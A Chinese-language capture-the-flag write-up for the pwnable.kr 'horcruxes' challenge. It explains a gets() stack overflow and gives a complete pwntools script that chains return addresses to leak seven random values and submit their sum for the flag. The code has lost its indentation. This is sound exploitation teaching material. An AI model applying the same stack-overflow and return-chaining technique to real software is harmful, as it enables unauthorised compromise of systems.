pwnable.kr 之 horcruxes

gets(s)栈溢出,且没有canary,没有PIE

本来想的是通过栈溢出直接跳到 if 内部输出flag,不过其地址为0x80A010B结合gets函数遇到回车(‘\x0a’)结束输入的特性,无法将地址0x80A010B写到返回地址上去。这个一步到位的方法pass。

从init_ABCDEFG函数中得到sub=a+b+c+d+e+f+g,且ABCDEFG函数的地址为0x809xxxx,可以操作。

那么问题的解决方法就变成了,通过栈溢出分别跳转到函数ABCDEFG中获得abcdefg从而得到sum,进入if分支读取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#coding:utf-8

# from libformatstr import FormatStr
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))
from pwn import *
import sys

local = 0
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
context.log_level = 'debug'

if local:
p = process('./horcruxes')
# p = process(argv=['',pay])
# p = process(["./ld.so","./easygame"],env={"LD_PRELOAD":"./libc.so.6"})
else:
p = remote("pwnable.kr","9032")

#内存地址随机化
def debug(addr=0,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
print "breakpoint_addr --> " + hex(text_base + 0x202040)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(p,"b *{}".format(hex(addr)))

sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
sl = lambda s :p.sendline(s)
ru = lambda s :p.recvuntil(s)
sda = lambda a,s :p.sendafter(a,s)
sla = lambda a,s :p.sendlineafter(a,s)

def leak(name,addr):
log.info(name + " --> %s",hex(addr))

A = 0x0809FE4B
B = 0x0809FE6A
C = 0x0809FE89
D = 0x0809FEA8
E = 0x0809FEC7
F = 0x0809FEE6
G = 0x0809FF05
main = 0x0809FF24

sla("Menu:","12")
pay = 0x78*'a'
pay += p32(A) + p32(B) + p32(C) + p32(D) + p32(E) + p32(F) + p32(G) + p32(0x809FFFC)
#gdb.attach(p,"b *0x80A00EE")
sla("earned? : ",pay)
def get_rand():
ru("(EXP +")
return int(ru(")")[:-1],10)
a = get_rand()
b = get_rand()
c = get_rand()
d = get_rand()
e = get_rand()
f = get_rand()
g = get_rand()
sum = a+b+c+d+e+f+g

sla("Menu:",'12')
#gdb.attach(p,"b *0x80A00EE")
sla("earned? : ",str(sum))
p.interactive()
0%